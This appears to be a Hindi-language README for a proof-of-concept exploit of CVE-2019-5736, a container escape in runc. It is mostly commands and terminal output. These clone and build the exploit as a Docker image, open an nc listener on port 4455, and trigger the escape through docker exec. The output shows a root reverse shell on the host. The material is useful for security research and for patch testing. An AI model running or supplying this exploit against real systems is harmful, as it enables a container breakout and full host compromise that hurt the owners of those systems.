
CVE-2019-5736 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, runc में एक कंटेनर एस्केप भेद्यता, जो Docker कंटेनर ब्रेकआउट के माध्यम से होस्ट शेल एक्सेस को सक्षम करती है।
निम्नलिखित रिपॉजिटरी के एक्सप्लॉइट को Docker इमेज में चलाने योग्य बनाया गया है।
$ git clone https://github.com/k-onishi/CVE-2019-5736-PoC
$ cd CVE-2019-5736-PoC
$ make
$ sudo docker build -t poc .
कंटेनर चलाना और होस्ट पर पोर्ट सुनना।
# terminal 1
$ sudo docker run poc
# terminal 2
$ nc -lvp 4455
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
runc का निष्पादन।
# terminal 3
$ sudo docker ps --format {{.Names}}
modest_lalande
docker exec -it modest_lalande /bin/sh
nc पर शेल वापस आता है।
# terminal 2
$ nc -lvp 4455
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::4455
Ncat: Listening on 0.0.0.0:4455
sh: इस शेल में जॉब कंट्रोल अक्षम है
sh-4.2#
$ uname -a
Linux CVE-2019-5736-CentOS 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
$ sudo cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)
